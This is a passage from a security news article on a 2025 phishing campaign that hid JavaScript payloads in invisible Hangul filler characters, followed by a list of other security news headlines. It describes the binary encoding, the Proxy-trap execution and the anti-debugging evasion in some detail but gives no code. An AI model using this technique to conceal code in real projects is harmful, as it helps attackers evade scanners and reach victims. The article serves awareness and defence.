
The attack occurred in early January 2025 and was quite sophisticated. For instance, the attackers possessed personal nonpublic information about their victims and used phishing links wrapped recursively in Postmark tracking links to conceal the final destination.
The obfuscation technique used in this attack was first described in October 2024 by well-known JavaScript developer Martin Kleppe involved with the JSFuck project.
The encoding employs two different Unicode filler characters, the Hangul half-width (U+FFA0) and the Hangul full width (U+3164), to represent the binary values 0 and 1, respectively. In the payload, each group of 8 such characters forms a single byte, representing an ASCII character.
The obfuscated code is stored as a property in a JavaScript object, and since the Hangul filler characters are rendered as empty spaces, the payload is invisible. Such attacks are difficult to detect because empty spaces reduce the chance that security scanners notice the threat.

According to Juniper Threat Labs, the payload is executed with a short bootstrap code when the property is accessed through a Proxy get() trap: a Python function takes the Unicode string of Hangul filler characters and restores the original JavaScript code.
In addition, attackers employ other obfuscation techniques, including base64 encoding and anti-debugging, to evade analysis.

“The attacks were highly personalized, including non-public information, and the initial JavaScript would try to invoke a debugger breakpoint if it were being analyzed, detect a delay, and then abort the attack by redirecting to a benign website,” – Juniper Threat Labs.
Juniper Threat Labs reports that two domains used in this campaign were previously related to the Tycoon 2FA phishing kit. If so, the above-described obfuscation technique can quickly become commonly used by cybercriminals.

2025.02.09 — Abandoned AWS S3 buckets could be used in attacks targeting supply chains
watchTowr discovered plenty of abandoned Amazon S3 buckets that could be used by attackers to deliver malware and backdoors to government agencies and large corporations. The researchers discovered…
Full article →
2025.02.12 — 2.8 million IP addresses used to brute-force network devices
The Shadowserver Foundation warns of a massive web login brute-forcing attacks targeting nearly 2.8 million IP addresses per day. Unknown attackers are seeking…
Full article →
2025.01.26 — Cisco patched a critical vulnerability in Meeting Management
Cisco released updates to fix a critical (CVSS score: 9.9) vulnerability in Meeting Management. The bug enables an unprivileged remote authenticated attacker to gain administrative privileges. The vulnerability…
Full article →
2025.02.25 — More than 100,000 users downloaded SpyLend malware from Google Play Store
According to Cyfirma, a malicious Android app called SpyLend was available on the official Google Play Store for some time and has been downloaded from there…
Full article →
2025.02.07 — 768 vulnerabilities were exploited by hackers in 2024
According to VulnCheck, 768 CVEs were registered as exploited in real-life attacks in 2024. This is 20% greater compared to 2023 when hackers exploited 639 vulnerabilities. Interestingly,…
Full article →
2025.02.20 — Newly-discovered vulnerabilities in OpenSSH open the door to MiTM and DoS attacks
OpenSSH fixed two vulnerabilities that could result in MiTM and denial of service (DoS) attacks. Interestingly, one of these bugs appeared in the code more than 10…
Full article →
2025.01.23 — Fake Telegram CAPTCHA forces users to run malicious PowerShell scripts
Hackers used the news of Ross Ulbricht pardoning to lure users to a rogue Telegram channel where they are tricked into running malicious PowerShell code. This…
Full article →
2025.02.03 — PyPI introduces a project archival system to combat malicious updates
The Python Package Index (PyPI) introduces a new project archival system: a project can now be archived to notify users that it's not expected to be updated…
Full article →
2025.03.07 — YouTube warns of scam video featuring its CEO
According to YouTube, scammers use an AI-generated video of the company's CEO in phishing attacks to steal user credentials. The scammers attack content creators by sending them…
Full article →
2025.02.14 — 12,000 Kerio Control firewalls remain vulnerable to RCE
Security experts report that more than 12,000 GFI Kerio Control firewall instances remain vulnerable to the critical RCE vulnerability CVE-2024-52875, which was fixed…
Full article →